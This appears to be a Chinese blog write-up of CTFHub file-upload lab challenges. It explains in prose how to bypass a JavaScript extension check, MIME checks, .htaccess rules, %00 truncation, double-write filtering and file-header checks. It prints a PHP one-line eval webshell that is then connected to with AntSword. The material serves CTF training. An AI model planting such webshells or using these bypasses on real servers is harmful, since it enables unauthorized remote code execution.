CTFHub 技能树-web文件上传

最新推荐文章于 2024-04-17 21:39:09 发布
最新推荐文章于 2024-04-17 21:39:09 发布
阅读量4.5k 收藏 5
点赞数
分类专栏: CTFHub 文章标签: 前端 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/akxnxbshai/article/details/123372644
版权

目录

无过滤:

前端过滤:

.htaccess:

MIME绕过:

双写后缀:

文件头检查:

无过滤:

直接传入一句话木马:

<?php @eval($_POST['1']);?>

然后用蚁剑连一下:

得到flag:

前端过滤:

function checkfilesuffix()

{

    var file=document.getElementsByName('file')[0]['value'];

    if(file==""||file==null)

    {

        alert("请添加上传文件");

        return false;

    }

    else

    {

        var whitelist=new Array(".jpg",".png",".gif");

        var file_suffix=file.substring(file.lastIndexOf("."));

        if(whitelist.indexOf(file_suffix) == -1)

        {

            alert("该文件不允许上传");

            return false;

        }

    }

}

只有jpg、png、gif格式可以上传。

先上传符合形式的文件,然后用bp抓包,改包。

改为:

再点击Forwdrd放回去,即可上传成功。

然后连接蚁剑,得到flag。

.htaccess:

由于和一道题是考察有关htacess的知识点,所以补充一了下自己的知识空白:

htaccess文件是Apache服务器中的一个配置文件,他负责相关目录下的网页配置。通过htaccess文件,可以帮助我们实现:网页301重定向,自定义404错误页面,改变文件扩展名,允许或组织特定的用户或者,目录的访问,禁止目录列表,配置默认文档等功能。

由于.htaccess文件可以被替换掉,所以首先上传一个名为.htaccess的文件。

文件意为将png文件当作php文件解析。

所以上传一个后缀为png且含有一句话木马的文件即可。

然后连接蚁剑得到flag。

MIME绕过:

先上传1.png文件:

然后抓包,放到Repeater里边修改上传。

然后用蚁剑连一下,得到flag。

00截断:

在url中%00表示ascll码中的0 ,而ascii中0作为特殊字符保留,表示字符串结束,所以当url中出现%00时就会认为读取已结束。

所以我们可以利用这一特点来用%00上传文件。

先上传1.png文件,然后抓包,改一下:

然后放回去,即可上传成功(注意不要直接进入Repeater,不能上传,好像是解析不了%00)

然后用蚁剑连一下,得到flag。

而且可以看一下,上传的确实是php文件,说明了%00截断成功。

双写后缀:

上传时将 Burpsuite 截获的数据包中文件名修改为1.pphpph,当第一个php被截获后,第一个的p和后边的hp有形成了一个php。

首先我直接上传了一个1.php文件

发现php被过滤,我又多试了几次,发现只会过滤一个php,所以利用双写绕过。

上传一个1.pphphp文件。

会自动变为1.php。

然后用蚁剑连接一下。

得到flag。

文件头检查:

上传png木马文件时会发现文件错误,应该是对文件进行了分析,看到名字就知道解析的是文件头,所以直接改一下文件头。

先上传一个正常的png文件然后将绝大部分后边文件删去(文件最好小一点,只留下文件的头部)

然后直接用蚁剑连。

得到flag。

f0njl
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
河南省网络安全高校战队联盟CTF训练营-web文件第一期
04-22
"河南省网络安全高校战队联盟CTF训练营-web文件第一期" 这个标题揭示了本次训练的主题,主要聚焦于网络安全领域中的一项重要技能——Web文件漏洞的利用与防御。CTF(Capture The Flag)是网络安全竞赛的一种...
CTFHub技能 Web-文件详解
千寻的博客
11-21 3043
文件漏洞是指由于程序员在对用户文件部分的控制不足或者处理缺陷,而导致的用户可以越过其本身权限向服务器上上可执行的动态脚本文件。这里上文件可以是木马,病毒,恶意脚本或者WebShell等。“文件”本身没有问题,有问题的是文件后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。 ———————————————— 版权声明:本文为CSDN博主「Fasthand_」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。 原文链接:ht
服务器上漏洞文件,web安全之文件漏洞
weixin_34858011的博客
08-05 225
文件漏洞是指用户上了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。文件功能本身是一个正常的业务需求,对于网站来说,很多时候也确实需要用户将文件到服务器。所以文件本身没有问题,但又问题的是文件后,服务器怎么处理、解释文件。如果服务器的处理逻辑做得不够安全,则会导致严重的后果。----摘自《白帽子讲WEB安全》一、漏洞成立的条件1、上文件能够被WEB容器...
绕过图片格式限制上木马获取WebShell
dieman0446的博客
07-11 3489
思路:   图片上功能中,前端页面上的是.png格式的图片文件,但是抓包Request中修改图片后缀为.php 可以绕过对上文件格式的限制,文件的上路径可以在上后的页面或查看上成功后的response中有显示, 记录下来后用菜刀连接即可。 (1)网站要求上png格式的文件 (2)保存-抓包,将文件后缀.png删除,剩余.php文件继续提交,提示成功。 ...
CTFHUB WEB 文件(上)
wwwwyyyrre的博客
04-26 780
在浏览器中显示的内容有 HTML、有 XML、有 GIF、还有 Flash ……抓一下包试试 正常情况都是可以抓到包的 如果在你的bp以及代理都没问题的情况下抓不到包并且还有提示该文件不允许上 那么可能就是使用了js前端验证。因为这道题无验证 说明只要是文件就可以上 因此上一个一句话木马 php文件 再用蚁剑连接就能拿到其flag。在文件漏洞中 js函数的主要作用就是验证你上文件类型是不是它允许的文件类型。了解了这些 我们正式进入实战 这里用的是ctfhub技能文件题目。
【CTF】文件(知识点+例题)(1)
qq_53099119的博客
03-23 5167
有的站点会出现仅进行了前端校验的情况(一切在前端做的安全防护,都是耍流氓),由于前端页面的源码是我们可以随意更改的,因此可以通过找到进行过滤的指令,更改成我们想要的功能即可。假设接下来就可以上一个名为1.png的木马文件,植入后门,将其上后,该文件文件后缀名为png,但会被当作php类型的文件进行解析,其中的一句话木马也能够被正常执行。因此,通过使用.user.ini,我们可以任意指定包含一个文件,这个文件可以是我们自己上的木马文件,从而通过该木马文件提供后门来获取当前服务器的webshell。
CtfHub-wp(web)
01-23
本文主要探讨了CTF(Capture The Flag)竞赛中与Web安全相关的知识点,通过解决一系列问题,我们可以学习到如何发现和利用网站的漏洞获取关键信息。首先,提到了通过查找网站的备份文件来获取线索,例如在URL后添加...
ctfhub web全部做题记录(持续跟新)
01-08
【总结】在CTF Web挑战中,了解信息泄露、备份文件、源码解析、文件后缀、vim缓存、版本控制、弱口令、SQL注入、文件漏洞等概念至关重要。掌握这些技能可以帮助参赛者在比赛中发现并利用安全漏洞,获取flag。...
ctf+web安全+任意文件+任意文件下载
10-08
ctf+web安全+任意文件+任意文件下载
ctf-all-in-one
01-30
ctf-all-in-one
CTFHUB-技能-Web题-文件(无验证,JS前端验证,前端验证)
Static______的博客
04-15 939
htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。】后,弹出的【另存为】对话框,在【文件名】一栏中输入【.htaccess】,【保存类型】选择【所有文件】,然后选择要保存的路径,单击【保存】按钮!上后显示相对路径,访问此路径,发现可以访问,且木马执行成功。此时,再上一句话木马,并把文件改为png格式。
CTFHub技能 Web-文件 详解
weixin_45808483的博客
11-15 2647
无验证 启动环境 我们上一句话木马 <?php @eval($_POST['shell']);?> 提示了相对路径, 我们直接使用蚁剑连接。 找到flag。 前端验证 上php文件,前端校验不允许上php文件 审计代码,只允许上图片类型 我们先将后缀改为 .jpg 上成功 再通过burp抓包,修改filename="1.php"和Content-Type: php 发送数据包,页面显示上成功 使用蚁剑连接 成...
CTFHUB-技能-Web题-文件(前端验证—文件头检查)
最新发布
Static______的博客
04-17 937
由此可见,只要是相同类型的文件,他的文件头就是一样的,这样代表了这个文件是属于什么类型,既然本题用到的是文件头检查,那我们制作一个图片马,将我们的一句话代码放入图片里面然后进行上。我们先创造一个名为1.png的图片,然后写一个名为1.php的一句话代码,把他们放到同一目录下,用cmd生成一个名为2.php的图片马。右侧开头%PNG就是这个文件文件头,这也代表了这个文件是一个png文件,打开一个jpg文件。简单来说,就是每个文件的最开头部分,就是文件头,他代表了这个文件的是属于什么类型,例如。
CTFshow web入门 web150-web170 文件
qq_56815564的博客
07-04 678
俗话说的好,逆向手的尽头是全栈,于是我又回来学web了,前面可能还看得懂一点,后面因为一心只想着做题目去了就没讲太细了,不过如果前面理解的话后面肯定也是知道的,所以加油吧。
CTFHUB技能——web篇
qq_63980959的博客
04-20 5265
因为我一开始是没打算写博客的,所有前面的图基本都没截图,以至于后面想写博客的时候没图,又没有金币了,我想吃西瓜都吃不到,更别说充金币。分币不花,玩的就是陪伴。前面的一些图来自于大佬们的博客,我会在结尾@出来。
CTFHUB技能(WEB)详解
weixin_52385170的博客
01-13 4480
CTFHUB 技能 WEB 详解
ctfhub——技能--文件
lulu001128的博客
02-28 644
文件解题过程
CTFHub技能web之文件(二)
wzhwzh123321的博客
02-15 527
MIME类型校验就是我们在上文件到服务端的时候,服务端会对客户端也就是我们上文件的Content-Type类型进行检测,如果是白名单所允许的,则可以正常上,否则上失败。直接将文件名改为phpphp后仍然回显空的后缀,应当是将php替换为空,直接双写会返回两个空,因此将后缀改为pphphp,只能识别到第二个字符开始的php并改为空,剩下的拼接仍然是一个php后缀。成功上,观察回显,发现上文件中的php后缀消失,结合题目应该是需要将php双写完成绕过。上成功,使用蚁剑连接,成功连接。
ctfhub技能web
m0_58030673的博客
05-19 993
ctfhub技能web方向wp
ctfhub技能web基础认证
03-13
CTFHub是一个CTF(Capture The Flag)竞赛平台,提供了丰富的技能来帮助学习者提升Web基础认证的能力。下面是CTFHub技能中关于Web基础认证的内容: 1. HTTP协议:了解HTTP协议的基本原理和常见的请求方法(GET...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

f0njl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值